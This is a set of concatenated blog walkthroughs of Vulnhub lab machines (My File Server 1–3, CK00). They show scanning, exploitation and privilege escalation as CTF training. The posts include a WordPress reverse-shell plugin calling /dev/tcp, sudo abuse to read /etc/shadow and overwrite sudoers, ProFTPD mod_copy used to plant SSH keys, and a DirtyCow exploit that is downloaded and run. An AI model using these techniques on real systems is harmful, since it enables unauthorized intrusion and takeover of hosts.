 -rwxr-xr-x  1 root root 19K Feb 25 16:22 ynetd
sh-4.2$ cat user.txt
   _____ _ _      ____                                     _____ 
  |  ___(_) | ___/ ___|  ___ _ ____   _____ _ __          |___ / 
  | |_  | | |/ _ \___ \ / _ \ '__\ \ / / _ \ '__|  _____    |_ \ 
  |  _| | | |  __/___) |  __/ |   \ V /  __/ |    |_____|  ___) |
  |_|   |_|_|\___|____/ \___|_|    \_/ \___|_|            |____/                                                           
 Flag : 0aab4a2c6d75db7ca2542e0dacc3a30f
 you can crack this hash, because it is also my pasword
 note: crack it, itiseasy

so after cracking the hash, I got bla user password bla:itiseasy. After that, I checked sudo permissions and writes. and I got the two things which can run by Sudo “capsh” and “setcap”.

and I got the root shell…..

sh-4.2$ sudo -l
 Matching Defaults entries for bla on this host:
     requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
     env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
     _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 User bla may run the following commands on this host:
     (ALL) NOPASSWD: /usr/sbin/capsh, (ALL) /usr/sbin/setcap

sh-4.2$ sudo -u root /usr/sbin/capsh --
[root@fileserver bla]# id
 uid=0(root) gid=0(root) groups=0(root)
[root@fileserver bla]# cd /root/
[root@fileserver ~]# ls 
 proof.txt
[root@fileserver ~]# cat proof.txt 
     _______ __    _____                                       _____
    / ____(_) /__ / ___/___  ______   _____  _____            |__  /
   / /_  / / / _ \\__ \/ _ \/ ___/ | / / _ \/ ___/  ______     /_ < 
  / __/ / / /  __/__/ /  __/ /   | |/ /  __/ /     /_____/   ___/ / 
 /_/   /_/_/\___/____/\___/_/    |___/\___/_/               /____/  
                                                                
 flag : 7be300997079eaebcdf9975ede6746e9
[root@fileserver ~]# id
 uid=0(root) gid=0(root) groups=0(root)
[root@fileserver ~]# hostname
 fileserver
[root@fileserver ~]# 

The post My File Server: 3 Walkthrough appeared first on Armour Infosec.

Penetration Testing Methodologies

Network Scan

• Netdicover
• Nmap

Enumeration

• WordPress Enumeration
• Local Hosts file entry

Exploit

• WordPress plugin php injection.

Privilege Escalation

• Horizontal Privilege Escalation
• wp-config.php
• sudo -l

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I’ve found is 192.168.2.4

netdiscover -i vboxnet0

Let’s proceed with network scan using Nmap aggressive scan as given below.

nmap -p- -sC -A -O 192.168.2.4

Enumeration

First thing we notice is port 80 is open and we see WordPress. When we check out the port in the browser.

We can see from the malformed page that we need to add an entry into our hosts file. When we try to access the admin page, we see what name we need to use in our hosts file

vim /etc/hosts

Eureka !!!!!!!!!! It’s work and finally got wordpress.

Now when we attempt to access the admin page, with credential admin:admin

Exploit

When I first started hacking and I came across a WordPress set, I would try all sorts of things to get PHP code into the site. Sometimes you can upload a shell as a plugin, sometimes you can upload a shell as media, both are intentional misconfigurations, and there are plugins that also allow for PHP.

You can just write your own Reverse Shell Plugin.  Save yourself some headaches, just make this, use it, and store it for later use.

touch rshell.php
vim rshell.php
 <?php
 
 /**
 * Plugin Name: Reverse Shell Plugin
 * Plugin URI:
 * Description: Reverse Shell Plugin
 * Version: 1.0
 * Author: Dasagreeva
 * Author URI: https://armourinfosec.com/
 */
 exec("/bin/bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'");
 ?>
zip rshellplugin.zip rshell.php

Once we get it zipped, we move to the WordPress UI. Under Plugins, we select Add New

We activate our plugin:

We catch our shell. Yesssssssssssss………

nc -nlvp 1505

Privilege Escalation

We look around for user flag and found it.

We then move to wp–config.php file for credentials.

cat /var/www/html/wp-config.php

got password bla_is_my_password

Excellent! Here’s where we cut out a step or two. I saw a few things and maybe that’s how I’m supposed to get to bla1 but on a hunch, I guess the password is: bla1_is_my_password. I got ssh connection.

ssh bla1@192.168.2.4

Checking out my sudo privileges, I learn that I can execute /bin/rbash as the user ck-00 which essentially moves us into the next account.

sudo -u ck-00 /bin/rbash

There is  sudo privileges as our new user.We can execute /bin/dd as root. dd  allows us to “convert and copy a file” and it’s used for backups. We can also use it to read and write files.We should be able to read the /etc/shadow file as root.

sudo dd if=/etc/shadow

Excellent! We should also be able to write a new line into sudoers

echo "ck-00 ALL=(ALL) NOPASSWD: ALL" | sudo dd of=/etc/sudoers

root flag…..

Conclusion: It was an easy CTF with some loop and really nice concepts. It was really helpful for beginners and people preparing for OSCP. Thank to Vishal Biswas AKA Cyberknight . I hope to see more challenges like this in the future.

The post CK00: Vulnhub Walkthrough | Infosec Warrior CTF appeared first on Armour Infosec.

Download: My File Server: 2 Walkthrough Vulnhub CTF

I will share with you a new Walkthrough for Vulnhub machines. My File Server: 2 This CTF machine is Created by Akanksha Sachin Verma You can download here this CTF . I would call this box on the easy side but there are a lot of moving parts that can cause you to follow some different directions. I don’t want to say to much so let’s get at it.

Penetration Testing Methodologies

Network Scan

• Netdicover
• Nmap

Enumeration

• SMBMAP
• Nikto
• Telnet

Exploit

• Injecting id_rsa.pub via FTP
• Spawn PTY shell

• ProFTPd 1.3.5 – File Copy

Privilege Escalation

• Capture the Flag.
• Password
• Kernel Exploit

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I’ve found is 192.168.56.3

netdiscover -i vboxnet1

Let’s proceed with network scan using Nmap aggressive scan as given below.

nmap -p- -A 192.168.56.3

Enumeration

It was very interesting as there were so many services running on the host network. We saw FTP’s “anonymous login enabled” and port 445 was also available for SMB.

In order to enumerate SMB and identify a username as “smbuser”, I use the following command.

smbmap -H 192.168.56.3
smbclient -L 192.168.56.3

So we used Nmap script for more enumeration

nmap --script smb-enum-shares.nse -p445 192.168.56.3

From the output of Nmap script scan, we came to know about the existence of “smbuser”. On login with smbclient with “smbuser” with password “smbuser”. But we don’t have write permission in it. On login with another smb share i.e. “smbdata”, we came to know that we have write permission in it. This can be helpful.

We also explore the IP host in the web browser as port 80 has been opened for the HTTP service.

I chose to run Nikto for HTTP weak config listing, and luckily found an entry for “readme.txt,” let’s test this in the web browser.

nikto -h http://192.168.56.3/

I chose to run nikto for HTTP weak config listing, and luckily found an entry for “readme.txt,” let’s test this in the web browser.

Since we have NFS service running on port 2069, we may be able to mount a share and find some juicy data! You’ll need to install nfs-common package if it doesn’t exist already. So I created a user by name of file2 and id @99

then I mounted the nfs share to /tmp/mnt as follows

useradd -u 99 file2
mkdir /tmp/mnt
mount -t nfs 192.168.56.3:/smbdata /tmp/mnt -nolock
cd /tmp/mnt/

We then, Moving forward to port number 2121, we found ProFTPD 1.3.5 which is vulnerable with “mod_copy” vulnerability using unauthenticated access.

so we give it a try and it was a success. Using this vulnerability, we can also cross-check the user by coping “passwd” into “/smbdata”.

telnet 192.168.56.3 2121
site help
cpfr /etc/passwd
cpto /smbdata/passwd_cpy

Exploit

In order to get a shell, we will create a ssh key pair by running ssh-keygen.Put the public key i.e. “id_rsa.pub/authorized_keys” to smb share “smbdata”.Copy the “authorized_keys” to “/home/smbuser/.ssh/” user “ProFTPD” Mod_copy Vulnerability.

Then copied the id_rsa.pub to mount position and transfer the key to /smbuser/.ssh/authorized_keys. Using ProFtpd 1.3.5 modcopy vulnerability on port 2121.

ssh-key
cp /root/.ssh/id_rsa.pub /tmp/mnt
telnet 192.168.56.3 2121
site help
site cpfr /smbdata/id_rsa.pub
site cpto /home/smbuser/.ssh/authorized_keys
quit

Now getting ssh connection with the key generated earlier

ssh -i id_rsa smbuser@192.168.56.3
id
hostname
uname -a

YEHHH!!!!!!!! Got the shell.

Privilege Escalation

On enumerating, we found there are several ways to get the root like a vulnerable kernel but we have a password which we got before. So lets try this

su root
cd
cat proof.txt
id
hostname
uname -a

OR we can go for a kernel exploit like before.

we transfer the exploit to the server and run exploit.

WOOOO..!!!

The post My File Server: 2 Walkthrough appeared first on Armour Infosec.

My File Server: 1 Walkthrough Vulnhub CTF

I will share with you a new Walkthrough for Vulnhub machines. My File Server: 1 This CTF machine is Created by Akanksha Sachin Verma You can download here this CTF . I would call this box on the easy side but there are a lot of moving parts which can cause you to follow some different directions. I don’t want to say to much so let’s get at it.

Penetration Testing Methodologies

Network Scan

• Netdicover
• Nmap

Enumeration

• SMBMAP
• Nikto

Exploit

• Injecting id_rsa.pub

Privilege Escalation

• Kernel Exploit
• Capture the Flag.

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I’ve found is 192.168.2.5

netdiscover  -i vboxnet0

Let’s proceed with network scan using Nmap aggressive scan as given below

nmap -p- -A 192.168.2.5

Enumeration

It was very interesting as there were so many services running on the host network. We saw FTP’s “anonymous login enabled” and port 445 was also available for SMB.

In order to enumerate SMB and identify a username as “smbuser” , I use the following command.

smbmap -H 192.168.2.5
smbclient  -L 192.168.2.5

On applying the Nmap script for SMB we found a user named smbuser

nmap --script smb-enum-shares.nse -p445 192.168.2.6

We also explore the IP host in the web browser as port 80 has been opened for the HTTP service. There was nothing special at web page just a link to Amrour Infosec.

I chose to run Nikto for HTTP weak config listing, and luckily found an entry for “readme.txt,” let’s test this in the web browser.

nikto -h http://192.168.2.5/

I think the author has kept this file as a clue that he wants to get the password by searching the readme.txt file. So now I had the username “smbuser” and the password “rootroot1” and it was time to connect to the host machine via ssh, so I tried to use this cred for ssh login, but we got an error as connection timeout, which means that the username “smbuser” cannot connect to the host machine via ssh.

Exploitation

Now time to generate some ssh keys, thus we used ssh-keygen to generate ssh public keys without password in our local machine i.e. KALI LINUX. Moving on after the key is created, we moved into the .ssh directory on our native shell, here we saw that we have the key named “id_rsa.pub”.

Let’s generate keys for SSH so we can login into smbuser!

Steps:

1. Create ssh key pair by running ssh-keygen.
2. Create .ssh directory on the mounted share /home/smbuser/.ssh
3. Copy the content of the public key to /home/smbuser/.ssh.
4. SSH into smbuser@_victim_ip_!

ssh-keygen
cd .ssh
ls -lha

With the help of above-enumerated creds “smbuser:rootroot1” we logged into FTP and create a folder as .ssh inside /home/smbuser, then try to upload the id_rsa.pub which we have generated in above mention step as authorized_keys  inside the .ssh directory.

ftp 192.168.2.5
pwd
mkdir .ssh
cd .ssh
put /root/.ssh/.id_rsa.pub authorized_keys
exit

Now we should be able to ssh with the private key:

ssh -i id_rsa smbuser@192.168.2.5

uname -a

I found it’s a really old version of the kernel that’s built here, so I’m trying to check for a piece of code to exploit, and luckily, I find it to be a DIRTYCOW exploit. So, I download a hack from Exploit-DB written in c.

Privilege Escalation

I downloaded the exploit inside the host machine, and then compiled it before running the exploit, so I ran the following commands.

python  -m SimpleHTTPServer 8080
ON THE SHELL
wget http://192.168.2.1:8080/40616.c
gcc 40616.c -o dasagreeva -pthread
./dasagreeva

Eureka……. Root ……

Boom! We got root the shell by running ./dasagreeva and finally, we obtain proof.txt file.

cd /root
ls
cat proof.txt
id
hostname

The post My File Server: 1 Walkthrough appeared first on Armour Infosec.